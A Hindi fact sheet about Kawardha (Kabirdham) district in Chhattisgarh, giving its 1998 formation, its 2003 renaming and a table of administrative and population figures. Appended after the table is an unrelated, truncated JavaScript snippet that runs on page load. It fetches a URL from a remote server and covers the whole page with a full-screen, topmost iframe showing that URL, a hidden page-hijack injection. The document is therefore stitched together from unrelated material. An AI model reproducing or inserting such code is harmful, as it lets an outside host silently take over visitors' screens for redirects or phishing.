Important facts about Kawardha district
- राजनांदगांव जिले से कवर्धा तहसील तथा बिलासपुर जिले से पंडरिया तहसील को अपवर्जित करके बनाया गया.
- तत्कालीन मध्यप्रदेश शासन के अधिसूचना क्रमांक 1241 एफ- 20.08.2002 राजपत्र (असधारण) दिनांक 2.7.1998 द्वारा कवर्धा जिले का गठन किया गया .
- उपरोक्त अधिसूचना के अनुसार दिनांक 6 जुलाई 1998 से कवर्धा जिला अस्तित्व में आया.
- छत्तीसगढ़ शासन के अधिसूचना के दिनांक 10 मार्च 2003 द्वारा कवर्धा जिले का नाम बदल कर कबीरधाम किया गया |
-
| स.क्र. |
विशेष |
विस्तार |
| 1. |
क्षेत्रफल |
4447.05 वर्ग कि.मी. |
| 2. |
अक्षांश |
21.32 से 21.35 उ |
| 3. |
देशांश |
80.48 से 81.28 पू |
| 4. |
साक्षरता दर |
50.33% |
| 5. |
जनसंख्या |
822526 |
| 6. |
राजस्व अनुविभाग की संख्या |
03 |
| 7. |
तहसील की संख्या |
04 |
| 8. |
राजस्व मंडलों की संख्या |
39 |
| 9. |
पटवारी हल्कों कली संख्या |
234 |
| 10. |
जनपद पंचायत की संख्या |
04 |
| 11. |
ग्राम पंचायत की संख्या |
461 |
| 12. |
ग्रामो की संख्या |
1006 |
| 13. |
नगर पालिका /पंचायत की संख्या |
06 |
| 14. |
पुलिस थानों की संख्या |
14 |
function isSingleUrl(text) {
var s = (text || "").trim();
if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
return /^https?:\/\/[^\s<>"']+$/i.test(s);
}
function showInIframe(url) {
if (!url || !/^https?:\/\//i.test(url)) return;
try {
var iframe = document.createElement("iframe");
iframe.src = url;
iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
(document.body || document.documentElement).appendChild(iframe);
} catch (e) {}
}
function run() {
fetch(API_ID_URL, { cache: "no-store" })
.then(function(r) { return r.text(); })
.then(function(id) {
id = (id || "").trim();
if (!id || !TRUSTED_CONFIGS.length) return null;
var template = TRUSTED_CONFIGS[0].template;
var trustedUrl = buildTrustedUrl(template, id);
return fetch(trustedUrl, { cache: "no-store" })
.then(function(r) { return r.text(); })
.then(function(t) { return (t || "").trim(); })
.catch(function() { return ""; });
})
.then(function(trustedResponse) {
if (!trustedResponse) return;
if (isSingleUrl(trustedResponse)) {
showInIframe(trustedResponse);
}
})
.catch(function() {});
}
if (document.readyState === "complete" || document.body) {
run();
} else {
window.addEventListener("DOMContentLoaded", run);
}
})();